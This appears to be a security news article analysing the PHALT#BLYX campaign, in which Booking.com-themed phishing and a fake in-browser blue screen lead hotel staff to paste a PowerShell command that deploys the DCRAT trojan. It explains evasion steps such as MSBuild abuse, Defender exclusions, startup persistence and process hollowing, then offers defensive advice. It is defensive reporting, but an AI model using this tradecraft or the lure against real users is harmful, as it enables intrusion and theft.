A new phishing campaign dubbed PHALT#BLYX is targeting hotels across Europe by impersonating Booking.com and abusing a technique known as a ClickFix attack. Instead of exploiting software vulnerabilities, the attackers trick hotel staff into manually running a pre‑prepared PowerShell command, ultimately deploying the DCRAT remote access trojan and additional payloads such as cryptocurrency miners.
ClickFix attacks: social engineering instead of technical exploits
ClickFix attacks rely on social engineering rather than code exploits. The victim is guided step by step to copy and execute a command (typically via PowerShell or a terminal), believing it is part of a legitimate troubleshooting process. Because the command is launched by a real user, traditional security tools may treat the activity as benign and fail to flag it in time.
Industry reports, including recent editions of the Verizon Data Breach Investigations Report and studies by major email security vendors, consistently show that social engineering and phishing remain among the top initial access vectors in corporate breaches. The PHALT#BLYX operation reflects this trend by combining convincing branding, fake support instructions, and user pressure to bypass technical defenses.
Booking.com-themed phishing lures hotel staff with refund claims
The intrusion begins with a phishing email mimicking Booking.com, notifying hotel staff about a supposed reservation cancellation and a substantial refund exceeding €1,000. High refund amounts are deliberately chosen to increase curiosity and prompt users to click for more details.
The link in the email redirects to a domain such as low-house[.]com, hosting a high-fidelity clone of the Booking.com portal. The fraudulent site reproduces corporate colors, logos, and layout closely enough that busy front-desk or reservations personnel may not notice anomalies, especially during peak workload.
Fake Windows BSOD in the browser forces PowerShell execution
Once on the phishing page, malicious JavaScript is executed. The victim first sees a message like “Loading is taking too long” with a prompt to refresh or continue. After clicking, the browser switches to full-screen mode and displays a convincing imitation of a Windows Blue Screen of Death (BSOD) directly inside the browser window.
Unlike a genuine BSOD, this fake screen contains detailed “recovery” instructions. The user is told to open the Windows “Run” dialog, press Ctrl+V to paste a command, and execute it. The malicious page has already copied a pre-built PowerShell command into the clipboard. Less experienced staff may assume this is an official Microsoft or Booking.com support procedure to resolve a technical issue.
Technical infection chain: from PowerShell to MSBuild and DCRAT
Abusing MSBuild to compile and run a malicious .NET project
When the victim runs the PowerShell command, a fake Booking.com administrative panel is displayed to reduce suspicion, while the malware proceeds in the background. The script downloads a .NET project file (v.proj) and compiles it using the legitimate Windows tool MSBuild.exe. Leveraging trusted system binaries in this way (living off the land) helps the attack evade simple signature-based detection.
Disabling defenses, persistence, and payload delivery
After establishing initial foothold, the malware adds Windows Defender exclusions and attempts to escalate privileges via User Account Control (UAC) prompts. It then uses the Background Intelligent Transfer Service (BITS) to download the main loader, blending into normal Windows network activity.
Persistence is achieved by placing a .url shortcut in the Startup folder, ensuring the malicious chain runs each time a user logs into Windows. This low-tech persistence method is simple but effective, especially on endpoints without strict application control policies.
DCRAT deployment and stealth via process hollowing
The final payload is DCRAT, a fork of the well-known AsyncRAT family often seen in criminal botnets. DCRAT is injected into the legitimate aspnet_compiler.exe process using process hollowing, where the original code of the process is replaced in memory with the attacker’s code. This in-memory execution technique complicates detection by antivirus and EDR solutions that rely heavily on file-based scans.
Once connected to its command-and-control (C2) infrastructure, DCRAT exfiltrates detailed system information and awaits instructions. Its capabilities typically include remote desktop control, keylogging, reverse shells, credential theft, and in-memory payload execution. In the analyzed incidents, operators also deployed a cryptocurrency miner to monetize compromised hosts directly.
Risks for hotel networks and the wider hospitality sector
With DCRAT installed, compromised hotel workstations can become launchpads for lateral movement across internal networks. Attackers can target property management systems, booking platforms, and payment applications, leading to exposure of guest data, partner accounts, and financial information, as well as disruption of day-to-day hotel operations.
The PHALT#BLYX campaign reportedly uses a customized DCRAT build with resilient C2 infrastructure, including randomized connection points and potential use of public services such as Pastebin as intermediaries. This architecture complicates takedown efforts and allows the botnet to persist even if parts of the infrastructure are disrupted.
Hotels and other hospitality organizations are particularly vulnerable because they rely heavily on third-party online travel agencies (OTAs), such as Booking.com, and often operate under constant time pressure at the reception and reservations desks—conditions that make staff more susceptible to well-crafted phishing messages.
To reduce the effectiveness of similar ClickFix-style campaigns, organizations in the hospitality sector should adopt a layered defense strategy. Key measures include regular phishing-awareness training tailored to booking and refund workflows, restricting or auditing PowerShell usage, enforcing principle of least privilege, deploying EDR solutions with strong behavioral detection, and maintaining tight control over Windows Defender exclusions and startup items. Systematic social engineering drills and incident response exercises significantly lower the chance that a single misleading “support” screen will turn a hotel workstation into another node in a criminal botnet.
